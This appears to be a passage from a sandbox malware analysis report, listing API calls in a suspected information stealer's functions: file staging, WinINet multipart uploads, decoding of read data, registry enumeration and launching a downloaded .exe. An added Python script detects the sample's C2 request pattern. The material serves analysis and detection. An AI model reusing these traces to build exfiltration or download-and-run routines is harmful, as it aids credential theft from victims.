                                    • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022ED1EA
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022ED32E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022ED335
                                  • lstrcat.KERNEL32(?,00000000), ref: 022ED46F
                                  • lstrcat.KERNEL32(?,00421478), ref: 022ED47E
                                  • lstrcat.KERNEL32(?,00000000), ref: 022ED491
                                  • lstrcat.KERNEL32(?,0042147C), ref: 022ED4A0
                                  • lstrcat.KERNEL32(?,00000000), ref: 022ED4B3
                                  • lstrcat.KERNEL32(?,00421480), ref: 022ED4C2
                                  • lstrcat.KERNEL32(?,00000000), ref: 022ED4D5
                                  • lstrcat.KERNEL32(?,00421484), ref: 022ED4E4
                                  • lstrcat.KERNEL32(?,00000000), ref: 022ED4F7
                                  • lstrcat.KERNEL32(?,00421488), ref: 022ED506
                                  • lstrcat.KERNEL32(?,00000000), ref: 022ED519
                                  • lstrcat.KERNEL32(?,0042148C), ref: 022ED528
                                  • lstrcat.KERNEL32(?,00000000), ref: 022ED53B
                                  • lstrcat.KERNEL32(?,00421490), ref: 022ED54A
                                    • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                    • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                  • lstrlen.KERNEL32(?), ref: 022ED591
                                  • lstrlen.KERNEL32(?), ref: 022ED5A0
                                  • memset.MSVCRT ref: 022ED5EF
                                    • Part of subcall function 022FACD7: StrCmpCA.SHLWAPI(0064A350,022EAA0E,?,022EAA0E,0064A350), ref: 022FACF6
                                  • DeleteFileA.KERNEL32(00000000), ref: 022ED61B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                  • String ID:
                                  • API String ID: 1973479514-0
                                  • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                  • Instruction ID: 41b4746c9ffd5306fe0af26f11e432d7f1e46ce2f38ded2814f4f51be4619bb3
                                  • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                  • Instruction Fuzzy Hash: 8FE15175960308ABCB44FBE4DD95DEEB37ABF24301F504169F20AA6194DF34AA09CF61
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008855F0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                  • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                  • lstrcatA.KERNEL32(?,00000000,00883810,00421474,00883810,00421470,00000000), ref: 0040D208
                                  • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                  • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                  • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                  • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                  • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                  • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                  • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00883680,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                  • lstrlenA.KERNEL32(?), ref: 0040D32A
                                  • lstrlenA.KERNEL32(?), ref: 0040D339
                                  • memset.MSVCRT ref: 0040D388
                                    • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                  • String ID:
                                  • API String ID: 2775534915-0
                                  • Opcode ID: a4f97debc43b6bb646af20662aa76c17e404fc0e6804846b70a1b628625fc9e7
                                  • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                  • Opcode Fuzzy Hash: a4f97debc43b6bb646af20662aa76c17e404fc0e6804846b70a1b628625fc9e7
                                  • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                  APIs
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                    • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                    • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022E5C5F
                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E5C7A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E5DFA
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 022E60D8
                                  • lstrlen.KERNEL32(00000000), ref: 022E60E9
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 022E60FA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022E6101
                                  • lstrlen.KERNEL32(00000000), ref: 022E6116
                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 022E612D
                                  • lstrlen.KERNEL32(00000000), ref: 022E613F
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022E6158
                                  • memcpy.MSVCRT(?), ref: 022E6165
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 022E6182
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022E6196
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 022E61B3
                                  • InternetCloseHandle.WININET(00000000), ref: 022E6217
                                  • InternetCloseHandle.WININET(00000000), ref: 022E6224
                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E5E5F
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                  • InternetCloseHandle.WININET(00000000), ref: 022E622E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                  • String ID:
                                  • API String ID: 1703137719-0
                                  • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                  • Instruction ID: 296a0ab31cd51e8f10a314ce8ebea061593ea8a90364c4d2e63d94af6b265ca4
                                  • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                  • Instruction Fuzzy Hash: 8212DD71970318ABCB55EBE4DD95EEEF37ABF24700F4041A9A20A62194DF742B89CF50
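The two function listings for the HTTP sender (the copy in the original image at 00405... and the relocated copy at 022E5... above) describe the same request shape: InternetOpenA with a NULL agent string, InternetConnectA with service type 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA with flags 0x00400100 (INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_PRAGMA_NOCACHE), a body assembled with lstrlenA/memcpy around `"` and `------` strings, HttpSendRequestA, then InternetReadFile into a 0xC7-byte buffer. The following is an added detection example, not code from the report or the sample: it parses constructed HTTP requests and flags the properties that shape produces on the wire. Assumptions, because the report does not show them: that the `------` strings form the multipart boundary prefix (treated as a weak hint only), and the constructed sample requests themselves.

```python
"""Flag WinINet-style C2 POSTs: no User-Agent, Pragma: no-cache, multipart body.

Added example; not code from the Joe Sandbox report or from the analysed sample.
"""
import re

BOUNDARY_RE = re.compile(r'boundary="?([^";]+)"?', re.IGNORECASE)


def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.x request parser: request line, headers (lower-cased), body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def flag_request(req: dict) -> list:
    """Return the individual indicators present in one request."""
    h = req["headers"]
    findings = []
    if "user-agent" not in h:
        # InternetOpenA(NULL, ...) in the listing: WinINet then sends no User-Agent.
        findings.append("no User-Agent header")
    if h.get("pragma", "").lower() == "no-cache":
        # INTERNET_FLAG_PRAGMA_NOCACHE (0x100) in the HttpOpenRequestA flags makes
        # WinINet add this header to the request.
        findings.append("Pragma: no-cache from request flags")
    ctype = h.get("content-type", "")
    if req["method"] == "POST" and ctype.lower().startswith("multipart/form-data"):
        m = BOUNDARY_RE.search(ctype)
        boundary = m.group(1) if m else "?"
        findings.append(f"multipart POST, boundary {boundary}")
        if boundary.startswith("------"):
            # Assumption: the '------' strings in the request builder are the
            # boundary prefix. Weak on its own; browsers also use dash-led boundaries.
            findings.append("boundary begins with the '------' run seen in the sample")
    return findings


def is_suspicious(req: dict) -> bool:
    """Alert only on the combination that matches the listing: a multipart POST
    sent with no User-Agent. A dash-prefixed boundary alone is normal traffic
    (browser uploads use ----WebKitFormBoundary...)."""
    f = flag_request(req)
    return "no User-Agent header" in f and any(x.startswith("multipart POST") for x in f)


# Constructed sample traffic (not captured from the sample's PCAP).
STEALER_LIKE = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: 203.0.113.10\r\n"
    b"Pragma: no-cache\r\n"
    b"Content-Type: multipart/form-data; boundary=------abc123\r\n"
    b"Content-Length: 0\r\n\r\n"
)
BROWSER_UPLOAD = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: files.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryX\r\n"
    b"Content-Length: 0\r\n\r\n"
)
PLAIN_GET = b"GET /update HTTP/1.1\r\nHost: updates.example.com\r\n\r\n"


if __name__ == "__main__":
    for name, raw in (("stealer-like", STEALER_LIKE),
                      ("browser", BROWSER_UPLOAD),
                      ("plain-get", PLAIN_GET)):
        req = parse_request(raw)
        print(name, is_suspicious(req), flag_request(req))
```

The missing User-Agent is the one indicator that follows directly from the NULL agent passed to InternetOpenA and is cheap to check at a proxy; the combination with a multipart POST keeps it from firing on every scripted GET, while the `Pragma: no-cache` and dash-boundary hints are there to enrich the alert, not to trigger it.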
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 022ECCD3
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 022ECCF0
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 022ECCFC
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 022ECD0F
                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 022ECD1C
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 022ECD40
                                  • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 022ECD5E
                                  • StrStrA.SHLWAPI(00000000,0064A364), ref: 022ECD85
                                  • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 022ECF09
                                  • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 022ECF20
                                    • Part of subcall function 022ECA87: memset.MSVCRT ref: 022ECABA
                                    • Part of subcall function 022ECA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022ECAD8
                                    • Part of subcall function 022ECA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022ECAE3
                                    • Part of subcall function 022ECA87: memcpy.MSVCRT(?,?,?), ref: 022ECB79
                                  • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 022ECFC1
                                  • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 022ECFD8
                                    • Part of subcall function 022ECA87: lstrcat.KERNEL32(?,00420B46), ref: 022ECBAA
                                    • Part of subcall function 022ECA87: lstrcat.KERNEL32(?,00420B47), ref: 022ECBBE
                                    • Part of subcall function 022ECA87: lstrcat.KERNEL32(?,00420B4E), ref: 022ECBDF
                                  • lstrlen.KERNEL32(00000000), ref: 022ED0AB
                                  • CloseHandle.KERNEL32(00000000), ref: 022ED103
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                  • String ID:
                                  • API String ID: 3555725114-3916222277
                                  • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                  • Instruction ID: b8ee77e0d7826efe1f20cddda4f1c15a5f10c0ad021c5b414e0cc68e0edc059c
                                  • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                  • Instruction Fuzzy Hash: 84E1FF75920308ABCB54EFE4DD91EEEF77AAF14700F404169F20AA6195DF346A89CF50
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0088A9F0,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                  • StrStrA.SHLWAPI(?,0088A798,00420B52), ref: 0040CAF7
                                  • StrStrA.SHLWAPI(00000000,0088AA68), ref: 0040CB1E
                                  • StrStrA.SHLWAPI(?,0088B328,00000000,?,00421458,00000000,?,00000000,00000000,?,00883760,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                  • StrStrA.SHLWAPI(00000000,0088B0C8), ref: 0040CCB9
                                    • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                    • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008836E0), ref: 0040C871
                                    • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                    • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                  • StrStrA.SHLWAPI(?,0088B0C8,00000000,?,0042145C,00000000,?,00000000,008836E0), ref: 0040CD5A
                                  • StrStrA.SHLWAPI(00000000,00883590), ref: 0040CD71
                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                  • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                  • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                  • String ID:
                                  • API String ID: 3555725114-3916222277
                                  • Opcode ID: ab42b5dea98dda6d1ec903180b661801f10a54a23581749008f7fe7b71c2160c
                                  • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                  • Opcode Fuzzy Hash: ab42b5dea98dda6d1ec903180b661801f10a54a23581749008f7fe7b71c2160c
                                  • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • RegOpenKeyExA.ADVAPI32(00000000,008870E8,00000000,00020019,00000000,004205B6), ref: 004183A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                  • wsprintfA.USER32 ref: 00418459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: be8ddf1fe9dc456048681201925a0f877c5bcd284375678f65f072a6cae44d7f
                                  • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                  • Opcode Fuzzy Hash: be8ddf1fe9dc456048681201925a0f877c5bcd284375678f65f072a6cae44d7f
                                  • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • memset.MSVCRT ref: 00410C1C
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                  • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                  • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                  • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                  • lstrlenA.KERNEL32(?), ref: 00410CA7
                                  • memset.MSVCRT ref: 00410CCD
                                  • memset.MSVCRT ref: 00410CE1
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00883680,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008855F0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                  • String ID: .exe
                                  • API String ID: 1395395982-4119554291
                                  • Opcode ID: 77704baf693414c0c6232ee0e38bb13a65318062e1f1704c2aae0d7082b93def
                                  • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                  • Opcode Fuzzy Hash: 77704baf693414c0c6232ee0e38bb13a65318062e1f1704c2aae0d7082b93def
                                  • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: c966b1d2bff0186d16334794f0ecdb2948fd0a8507f778a3f9c1e08f5450a090
                                  • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
